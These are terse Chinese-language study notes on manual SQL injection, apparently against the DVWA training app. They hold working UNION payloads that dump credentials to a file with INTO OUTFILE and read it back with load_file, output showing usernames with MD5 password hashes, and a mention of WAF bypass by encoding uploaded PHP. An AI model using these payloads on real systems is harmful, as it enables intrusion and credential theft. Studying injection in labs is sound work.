无限制输入(单引号闭合)
select user,passwd from users where username = ‘$user’ and passwd = '$passwd'
分号隔离
手工注入检测流程
输入单引号检测是否存在注入,语句构造
' union select user(),@@VERSION -- 注意注释符: -- 左右都有一个空格
information_schema 只有在 root权限下才能读取
上传php转码绕过waf
批量下载数据库
‘ union select null,concat(user,':',password) from users INTO OUTFILE '/tmp/users.db' --
查看文件内容
ID: ' union select null,load_file('/tmp/users.db') -- First name: Surname: \N admin:5f4dcc3b5aa765d61d8327deb882cf99 \N gordonb:e99a18c428cb38d5f260853678922e03 \N 1337:8d3533d75ae2c3966d7e0d4fcc69216b \N pablo:0d107d09f5bbe40cade3de5c71e9e9b7 \N smithy:5f4dcc3b5aa765d61d8327deb882cf99